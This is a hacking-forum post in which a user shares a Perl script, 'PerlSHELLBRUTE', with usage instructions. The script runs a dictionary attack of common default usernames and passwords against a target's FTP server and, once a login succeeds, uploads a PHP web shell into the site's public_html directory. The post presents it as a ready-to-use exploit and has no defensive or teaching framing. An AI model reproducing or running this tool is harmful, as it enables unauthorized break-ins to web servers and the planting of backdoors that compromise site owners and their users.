iExploit

Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!

Sign In Apply for Membership

Top Posters

Who's Online (0)

Powered by Vanilla. Made with Bootstrap.
Looking to introduce yourself? Look no further, and click here! We also have IRC! [irc.evilzone.org #iexploit]
PerlSHELLBRUTE - FTP With Shell Upload
  • Mr. P-teoMr. P-teo
    Posts: 269
    I made the quite recently, i thought i would and learn a new module from CPAN.

    So what this does it uses a dictionary attack against a hosts FTP server, if it is successful then it will upload a shell and close the connection. This is all automatic and you just need to enter the hostname (url without http://www.)

    This has low success rate, that is why i call this - "The Idiot Exploit" as it works with common / weak passwords.


    use Net::FTP;

    ##################################################################

    #PerlSHELLBRUTE Exploit
    #This Script Was Written By MR. P-teo aka Archx
    #Net::FTP Support Given By TheEliteNoob
    #Works using the Net::FTP Module
    #All Credits go to Module creator, Mr. P-teo and TheEliteNoob
                                                                     
    ##################################################################

    #Instructions, Run Exploit, Keep your chosen PHP shell in same dir, 
    #(Shell must have name -> sh3llphp.php)if exploit is successfull, 
    #visit url.

    #ENJOY.

    @user = (\"apache\",\"root\", \"admin\", \"username\",\"user\",\"username\",\"admin1\",\"administrator\",\"admin123\",\"123456\",\"12345\",\"admin\",
    \"123456789\",\"654321\",\"$hostname\",\"admin\",\"admin\",\"admin\",\"admin\",\"admin\",\"$hostname\",\"123\");
    @pass = (\"apache\",\"toor\", \"admin\", \"password\",\"pass\",\"passwd\",\"admin1\",\"administrator\",\"admin123\",\"123456\",\"12345\",\"Password\",
    \"123456789\",\"654321\",\"admin\",\"abcd1234\",\"abc123\",\"12345678\",\"111111\",\"passw0rd\",\"$hostname\",\"123\");
    $directory = \"/public_html\";

    #SHELLNAME

    my $shell_trans = \"sh3llphp.php\";

    print \"\n\nFTP Hostname: \";
    chomp($hostname = <STDIN>);

    my $ftp = Net::FTP->new($hostname, Debug => 0, Timeout=>120) or die \"Unable To locate Host - $hostname\";
    my $num = -1;
    foreach(@user){
    	$num++;
    }	
    my $response = 1;
    my $cred = 0;
    while($cred != $num){
    	$user = @user[$cred];
    	$passwd = @pass[$cred];
    	my $fail = 0;
    	print \"\n#Attempting To Get Credentials...\";
    	$ftp->login($user, $passwd, Timeout=>150) or $fail = 1;
    	$cred++;
    	if ($fail == 1) {
    		next;
    	}elsif($fail == 0){
    		print \"\n#Connection Established...\n\";		
    		$ftp->cwd($directory); 
    		print \"#Preparing To Transfer Shell...\n\";
    		$ftp->put($shell_trans) or $upload = 1;
    		if($upload == 1){
    			print \"#ERROR Uploading Shell...\n\";
    		}else{
    			print \"#Shell Uploaded, Exploit Complete...\n\";
    		}
    		$ftp->quit;
    		last;	
    	}
    }
    if($response == 1){
    	print \"\n\nCredentials Not Found, Connection Could Not Be Established.\n\n\";
    }


    Hope you like this.
    Skype: mrpt3o
    Twitter: MrPteo


    image
Add a Comment